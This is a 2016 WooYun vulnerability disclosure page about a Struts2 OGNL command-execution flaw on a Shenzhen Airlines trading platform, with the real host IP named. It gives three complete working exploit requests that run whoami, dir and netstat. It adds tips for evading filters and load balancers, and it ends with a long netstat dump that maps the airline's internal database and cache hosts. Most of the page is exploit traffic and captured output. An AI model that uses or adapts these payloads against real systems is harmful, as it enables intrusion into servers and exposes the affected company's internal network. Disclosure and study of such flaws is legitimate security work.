深圳航空某交易平台远程执行漏洞 | wooyun-2016-0218722| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0218722

漏洞标题：深圳航空某交易平台远程执行漏洞

漏洞作者：艺术家

提交时间：2016-06-14 09:48

修复时间：2016-06-20 15:50

公开时间：2016-06-20 15:50

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-06-14：细节已通知厂商并且等待厂商处理中
2016-06-14：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-20：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

ST2这里有一个地方需要突破一下，用工具是不行的。
漏洞地址：http://113.108.100.142/weballiance/cooperateCode!goSearchDemo255_300.action

存在漏洞。
查看下主机名。

POST /weballiance/cooperateCode!goSearchDemo255_300.action?selColor=blue&weballiancecode=L20120515152239892420 HTTP/1.1
User-Agent: Mozilla/5.0 (baidu spider)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 624
Host: 113.108.100.142
Connection: Keep-Alive
Pragma: no-cache
Cookie: 
redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27whoami%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}

ppsc2\shenzhenair

这里有2个负载均衡，也有一些防护设备。上传文件请上传两次才能保证每台上面都有上传文件。

这里工具不能执行dir 命令。因为有\ /的问题，所以要自己去提交。（这个很基础，也很使用，在7.0下面经常会遇到这个问题）代码：

POST /weballiance/cooperateCode!goSearchDemo255_300.action?selColor=blue&weballiancecode=L20120515152239892420 HTTP/1.1
User-Agent: Mozilla/5.0 (baidu spider)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 683
Host: 113.108.100.142
Connection: Keep-Alive
Pragma: no-cache
Cookie: 
redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27cmd.exe /c dir /a /od D:\\apache\\apache-tomcat-7.0.32-A\\webapps%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}

POST /weballiance/cooperateCode!goSearchDemo255_300.action?selColor=blue&weballiancecode=L20120515152239892420 HTTP/1.1
User-Agent: Mozilla/5.0 (baidu spider)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 641
Host: 113.108.100.142
Connection: Keep-Alive
Pragma: no-cache
Cookie: 
redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27cmd.exe /c netstat -ano%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2016 02:39:42 GMT
Server: Apache/2.2.22 (Win32) mod_jk/1.2.37
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
Content-Length: 28721
Active Connections
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       8500
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       724
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING       484
  TCP    0.0.0.0:1029           0.0.0.0:0              LISTENING       1292
  TCP    0.0.0.0:1030           0.0.0.0:0              LISTENING       1292
  TCP    0.0.0.0:1920           0.0.0.0:0              LISTENING       1292
  TCP    0.0.0.0:2425           0.0.0.0:0              LISTENING       4680
  TCP    0.0.0.0:2428           0.0.0.0:0              LISTENING       4680
  TCP    0.0.0.0:2621           0.0.0.0:0              LISTENING       5696
  TCP    0.0.0.0:2625           0.0.0.0:0              LISTENING       5696
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       2104
  TCP    0.0.0.0:3661           0.0.0.0:0              LISTENING       1292
  TCP    0.0.0.0:4026           0.0.0.0:0              LISTENING       6212
  TCP    0.0.0.0:4028           0.0.0.0:0              LISTENING       6212
  TCP    0.0.0.0:5800           0.0.0.0:0              LISTENING       2136
  TCP    0.0.0.0:5900           0.0.0.0:0              LISTENING       2136
  TCP    0.0.0.0:6014           0.0.0.0:0              LISTENING       1292
  TCP    0.0.0.0:6129           0.0.0.0:0              LISTENING       1148
  TCP    0.0.0.0:8009           0.0.0.0:0              LISTENING       5696
  TCP    0.0.0.0:8068           0.0.0.0:0              LISTENING       5316
  TCP    0.0.0.0:8069           0.0.0.0:0              LISTENING       5316
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       5696
  TCP    0.0.0.0:8081           0.0.0.0:0              LISTENING       6212
  TCP    0.0.0.0:8088           0.0.0.0:0              LISTENING       1748
  TCP    0.0.0.0:8089           0.0.0.0:0              LISTENING       1748
  TCP    0.0.0.0:8098           0.0.0.0:0              LISTENING       8792
  TCP    0.0.0.0:8119           0.0.0.0:0              LISTENING       8792
  TCP    0.0.0.0:9009           0.0.0.0:0              LISTENING       6212
  TCP    0.0.0.0:38888          0.0.0.0:0              LISTENING       2044
  TCP    10.12.66.29:80         210.75.21.99:47177     ESTABLISHED     5836
  TCP    10.12.66.29:139        0.0.0.0:0              LISTENING       4
  TCP    10.12.66.29:1044       10.11.108.43:9080      CLOSE_WAIT      1748
  TCP    10.12.66.29:1133       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:1282       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:1289       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:1315       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:1334       59.151.45.134:80       CLOSE_WAIT      1748
  TCP    10.12.66.29:1367       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:1369       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:1407       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1408       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1409       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1410       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1411       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1412       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1413       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1414       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1415       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1416       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1417       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1418       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1419       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1420       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1421       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1422       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1423       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1424       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1425       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1426       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1427       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1428       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1429       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1430       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1431       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1432       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1433       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1434       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1435       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1436       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1437       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1438       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1439       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1440       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1441       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1442       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1443       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1444       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1445       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1446       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1447       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1448       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1449       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1450       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1451       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1452       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1453       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1454       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1455       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1456       10.11.102.107:11211    ESTABLISHED     5696
  TCP    10.12.66.29:1457       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1458       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1459       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1460       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1461       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1462       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1463       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1464       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1465       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1466       10.12.66.33:1521       ESTABLISHED     5696
  TCP    10.12.66.29:1484       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1485       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1486       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1487       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1488       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1489       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1490       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1491       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1492       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1493       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1494       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1495       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1496       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1497       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1498       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1499       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1500       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1501       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1502       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1503       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1504       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1505       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1506       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1507       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1508       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1509       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1510       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1511       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1512       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1513       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1514       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1515       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1516       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1517       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1518       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1519       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1520       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1521       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1522       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1523       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1524       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1525       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1526       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1527       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1528       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1529       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1530       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1531       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1532       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1533       10.11.102.107:11211    ESTABLISHED     6212
  TCP    10.12.66.29:1534       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1535       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1536       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1537       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1538       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1539       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1540       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1541       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1542       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1543       10.12.66.33:1521       ESTABLISHED     6212
  TCP    10.12.66.29:1577       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:1578       59.151.44.157:80       CLOSE_WAIT      8792
  TCP    10.12.66.29:1615       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1616       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1617       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1618       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1619       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1626       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:1677       10.11.102.107:9001     CLOSE_WAIT      6212
  TCP    10.12.66.29:1702       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:1703       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:1705       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:1706       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:1727       10.11.103.83:9081      CLOSE_WAIT      8792
  TCP    10.12.66.29:1792       59.151.45.134:80       CLOSE_WAIT      1748
  TCP    10.12.66.29:1815       10.110.10.71:8014      ESTABLISHED     2424
  TCP    10.12.66.29:1822       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1823       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1824       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1825       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:1830       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:1836       10.11.108.43:9080      CLOSE_WAIT      1748
  TCP    10.12.66.29:1837       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:1838       59.151.45.134:80       ESTABLISHED     1748
  TCP    10.12.66.29:1840       61.155.159.101:80      TIME_WAIT       0
  TCP    10.12.66.29:1841       61.155.159.101:80      TIME_WAIT       0
  TCP    10.12.66.29:1842       140.206.211.15:443     TIME_WAIT       0
  TCP    10.12.66.29:1843       140.206.211.15:443     TIME_WAIT       0
  TCP    10.12.66.29:1844       140.206.211.15:443     TIME_WAIT       0
  TCP    10.12.66.29:1845       10.11.108.43:9080      CLOSE_WAIT      5316
  TCP    10.12.66.29:1846       140.206.211.15:443     TIME_WAIT       0
  TCP    10.12.66.29:1847       120.132.34.101:80      CLOSE_WAIT      8792
  TCP    10.12.66.29:1848       63.88.100.162:80       CLOSE_WAIT      2728
  TCP    10.12.66.29:1849       10.11.108.43:9080      CLOSE_WAIT      8792
  TCP    10.12.66.29:1850       61.155.159.101:80      TIME_WAIT       0
  TCP    10.12.66.29:1852       61.155.159.101:80      TIME_WAIT       0
  TCP    10.12.66.29:1853       10.12.66.29:4028       TIME_WAIT       0
  TCP    10.12.66.29:1854       10.12.66.113:139       TIME_WAIT       0
  TCP    10.12.66.29:1855       10.12.66.113:139       TIME_WAIT       0
  TCP    10.12.66.29:1856       10.12.66.29:4028       TIME_WAIT       0
  TCP    10.12.66.29:1857       10.12.66.28:4083       TIME_WAIT       0
  TCP    10.12.66.29:1858       10.12.66.28:4150       TIME_WAIT       0
  TCP    10.12.66.29:1859       10.12.66.31:4045       TIME_WAIT       0
  TCP    10.12.66.29:1860       10.12.66.31:3755       TIME_WAIT       0
  TCP    10.12.66.29:1861       10.12.66.29:2625       TIME_WAIT       0
  TCP    10.12.66.29:1862       61.155.159.101:80      TIME_WAIT       0
  TCP    10.12.66.29:1863       103.37.152.53:80       ESTABLISHED     5316
  TCP    10.12.66.29:1864       10.11.103.83:9081      ESTABLISHED     1748
  TCP    10.12.66.29:1900       92.123.143.249:80      CLOSE_WAIT      3808
  TCP    10.12.66.29:2334       63.110.60.17:80        CLOSE_WAIT      9436
  TCP    10.12.66.29:2621       10.12.66.28:2199       ESTABLISHED     5696
  TCP    10.12.66.29:2621       10.12.66.28:2200       ESTABLISHED     5696
  TCP    10.12.66.29:2621       10.12.66.29:4051       ESTABLISHED     5696
  TCP    10.12.66.29:2621       10.12.66.31:8304       ESTABLISHED     5696
  TCP    10.12.66.29:2621       10.12.66.31:8305       ESTABLISHED     5696
  TCP    10.12.66.29:2621       10.12.66.31:8306       ESTABLISHED     5696
  TCP    10.12.66.29:2621       10.12.66.31:8307       ESTABLISHED     5696
  TCP    10.12.66.29:2629       96.7.54.97:80          CLOSE_WAIT      9160
  TCP    10.12.66.29:2632       10.12.66.31:3761       ESTABLISHED     5696
  TCP    10.12.66.29:2636       10.12.66.31:3753       ESTABLISHED     5696
  TCP    10.12.66.29:2638       10.12.66.31:4051       ESTABLISHED     5696
  TCP    10.12.66.29:2640       10.12.66.28:4148       ESTABLISHED     5696
  TCP    10.12.66.29:2642       10.12.66.28:4081       ESTABLISHED     5696
  TCP    10.12.66.29:2644       10.12.66.31:4043       ESTABLISHED     5696
  TCP    10.12.66.29:2780       10.12.65.51:6014       ESTABLISHED     1292
  TCP    10.12.66.29:3031       59.151.45.134:80       CLOSE_WAIT      1748
  TCP    10.12.66.29:3225       10.12.65.60:1918       ESTABLISHED     1292
  TCP    10.12.66.29:3282       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:3586       120.132.34.101:80      CLOSE_WAIT      8792
  TCP    10.12.66.29:3653       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:3669       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:3676       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:3677       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:3712       59.151.45.134:80       CLOSE_WAIT      1748
  TCP    10.12.66.29:3722       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:3771       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:3817       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:3822       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:3945       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:3970       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:3990       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:4011       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:4026       10.12.66.28:2613       ESTABLISHED     6212
  TCP    10.12.66.29:4026       10.12.66.28:2614       ESTABLISHED     6212
  TCP    10.12.66.29:4026       10.12.66.29:4032       ESTABLISHED     6212
  TCP    10.12.66.29:4026       10.12.66.31:11191      ESTABLISHED     6212
  TCP    10.12.66.29:4026       10.12.66.31:11192      ESTABLISHED     6212
  TCP    10.12.66.29:4026       10.12.66.31:11193      ESTABLISHED     6212
  TCP    10.12.66.29:4026       10.12.66.31:11194      ESTABLISHED     6212
  TCP    10.12.66.29:4032       10.12.66.29:4026       ESTABLISHED     5696
  TCP    10.12.66.29:4034       10.12.66.31:3761       ESTABLISHED     6212
  TCP    10.12.66.29:4036       10.12.66.31:3753       ESTABLISHED     6212
  TCP    10.12.66.29:4038       10.12.66.31:4051       ESTABLISHED     6212
  TCP    10.12.66.29:4042       10.12.66.28:4081       ESTABLISHED     6212
  TCP    10.12.66.29:4045       10.12.66.28:4148       ESTABLISHED     6212
  TCP    10.12.66.29:4049       10.12.66.31:4043       ESTABLISHED     6212
  TCP    10.12.66.29:4051       10.12.66.29:2621       ESTABLISHED     6212
  TCP    10.12.66.29:4060       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:4110       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:4239       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:4327       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:4415       59.151.45.134:80       CLOSE_WAIT      1748
  TCP    10.12.66.29:4416       59.151.45.134:80       CLOSE_WAIT      1748
  TCP    10.12.66.29:4503       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:4533       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:4661       10.12.66.29:8009       ESTABLISHED     5836
  TCP    10.12.66.29:4736       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:4737       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:4761       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:4763       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:4794       10.11.103.83:9081      CLOSE_WAIT      1748
  TCP    10.12.66.29:4803       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:4813       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:4920       10.12.66.33:1521       ESTABLISHED     1748
  TCP    10.12.66.29:4950       10.12.66.29:9009       ESTABLISHED     5836
  TCP    10.12.66.29:4957       10.12.66.33:1521       ESTABLISHED     5316
  TCP    10.12.66.29:4966       10.12.66.33:1521       ESTABLISHED     8792
  TCP    10.12.66.29:5002       0.0.0.0:0              LISTENING       5696
  TCP    10.12.66.29:5003       0.0.0.0:0              LISTENING       6212
  TCP    10.12.66.29:8009       10.12.66.29:1615       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1616       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1617       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1618       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1619       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1822       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1823       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1824       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:1825       ESTABLISHED     5696
  TCP    10.12.66.29:8009       10.12.66.29:4661       ESTABLISHED     5696
  TCP    10.12.66.29:8088       10.11.102.104:4121     TIME_WAIT       0
  TCP    10.12.66.29:8088       10.11.102.104:4150     TIME_WAIT       0
  TCP    10.12.66.29:8088       10.11.102.104:4157     FIN_WAIT_2      1748
  TCP    10.12.66.29:8088       10.11.102.104:4219     FIN_WAIT_2      1748
  TCP    10.12.66.29:8088       10.11.102.104:4246     ESTABLISHED     1748
  TCP    10.12.66.29:8088       10.11.102.104:4248     ESTABLISHED     1748
  TCP    10.12.66.29:8088       10.12.67.28:3276       FIN_WAIT_2      1748
  TCP    10.12.66.29:8088       59.151.29.91:61523     TIME_WAIT       0
  TCP    10.12.66.29:8088       59.151.29.91:61599     TIME_WAIT       0
  TCP    10.12.66.29:8088       59.151.29.91:61642     TIME_WAIT       0
  TCP    10.12.66.29:8088       59.151.29.91:61826     TIME_WAIT       0
  TCP    10.12.66.29:8088       59.151.29.91:62296     TIME_WAIT       0
  TCP    10.12.66.29:8088       59.151.29.91:62457     TIME_WAIT       0
  TCP    10.12.66.29:8088       59.151.29.91:62727     TIME_WAIT       0
  TCP    10.12.66.29:9009       10.12.66.29:1702       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:1703       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:1705       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:1706       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:3282       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:4533       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:4736       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:4737       ESTABLISHED     6212
  TCP    10.12.66.29:9009       10.12.66.29:4950       ESTABLISHED     6212
  TCP    10.12.66.29:38888      10.12.69.51:48610      ESTABLISHED     2044
  TCP    127.0.0.1:1031         0.0.0.0:0              LISTENING       2500
  TCP    127.0.0.1:1371         127.0.0.1:1372         ESTABLISHED     5696
  TCP    127.0.0.1:1372         127.0.0.1:1371         ESTABLISHED     5696
  TCP    127.0.0.1:1383         127.0.0.1:1384         ESTABLISHED     6212
  TCP    127.0.0.1:1384         127.0.0.1:1383         ESTABLISHED     6212
  TCP    127.0.0.1:1391         127.0.0.1:1392         ESTABLISHED     5696
  TCP    127.0.0.1:1392         127.0.0.1:1391         ESTABLISHED     5696
  TCP    127.0.0.1:1393         127.0.0.1:1394         ESTABLISHED     5696
  TCP    127.0.0.1:1394         127.0.0.1:1393         ESTABLISHED     5696
  TCP    127.0.0.1:1395         127.0.0.1:1396         ESTABLISHED     5696
  TCP    127.0.0.1:1396         127.0.0.1:1395         ESTABLISHED     5696
  TCP    127.0.0.1:1397         127.0.0.1:1398         ESTABLISHED     5696
  TCP    127.0.0.1:1398         127.0.0.1:1397         ESTABLISHED     5696
